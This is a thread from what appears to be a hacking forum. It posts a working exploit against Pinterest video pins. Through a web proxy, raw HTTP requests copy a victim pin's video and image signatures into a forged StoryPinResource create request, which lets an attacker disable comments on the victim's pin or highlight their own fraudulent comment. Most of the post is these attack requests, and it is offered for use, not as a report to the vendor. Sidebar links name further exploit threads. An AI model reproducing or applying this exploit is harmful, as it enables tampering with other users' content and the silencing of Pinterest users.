Pinterest Exploit: Disable Video Pin Comments & Highlight Attacker's Comment
by erjdfrqowe - Monday November 18, 2024 at 02:56 PM
#1
--- using a web proxy (mitmproxy, burpsuite, fiddler, caido), send GET pinterest.com/pin/{victim_pin_id}


GET /pin/{victim_pin_id}/ HTTP/1.1
Host: pinterest.com




--- save "video_signature":"aaaabbbbccccddddeeee" & "image_signature_adjusted":"ppppttttyyyyuuuuzzzz" from HTTP response

--- create video pin and capture following HTTP request


POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com

source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\"hhhhjjjjkkkklllloooo\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"uuuukkkkjjjjttttvvvv\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}


--- send following request changing a body parameter of capture request


POST /resource/StoryPinResource/create/ HTTP/1.1
Host: pinterest.com

source_url=/pin-creation-tool/&data={"options":{"alt_text":"","allow_shopping_rec":true,"description":"","is_comments_allowed":true,"is_removable":false,"is_unified_builder":true,"link":"","orbac_subject_id":"","story_pin":"{\"metadata\":{\"pin_title\":\"\",\"pin_image_signature\":\" ppppttttyyyyuuuuzzzz\",\"canvas_aspect_ratio\":0.56},\"pages\":[{\"blocks\":[{\"block_style\":{\"height\":100,\"width\":100,\"x_coord\":0,\"y_coord\":0},\"tracking_id\":\"\",\"video_signature\":\"aaaabbbbccccddddeeeee\",\"type\":3}],\"clips\":[{\"clip_type\":1,\"end_time_ms\":-1,\"is_converted_from_image\":false,\"source_media_height\":568,\"source_media_width\":320,\"start_time_ms\":-1}],\"layout\":0,\"style\":{\"background_color\":\"#FFFFFF\"}}]}","user_mention_tags":"[]"},"context":{}}


--- visit your video pin that created with victims video_signature,image_signature_adjusted
--- disable comment of your video pin or create comment and highlight it
--- exploit is impacted on pinterest.com/pin/{victim_pin_id}/

This vulnerability allows an attacker to disable all comments on any video pin, effectively silencing other users, while simultaneously highlighting fraudulent or malicious comments.
Reply
#2
thans for sharing bro
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Exploit Hikvision Camera cctv A3g00n 160 4,495 11 hours ago
Last Post: v3nuzc0d3r2325
  new wordpress website takeover vuln (video + poc ) zinzeur 302 26,065 08-06-2025, 10:39 AM
Last Post: k4mui
  Exploit Safety-net PoC Inexorable_Baer 2 239 08-02-2025, 08:53 AM
Last Post: Inexorable_Baer
  Telerik Exploit report server A3g00n 1 406 04-11-2025, 04:16 AM
Last Post: dghdj
  Ivanti/Pulse VPN Client Exploit leading to a privilege escalation Loki 17 1,769 04-07-2025, 03:34 PM
Last Post: ansikkamakola

Forum Jump:


 Users browsing this thread: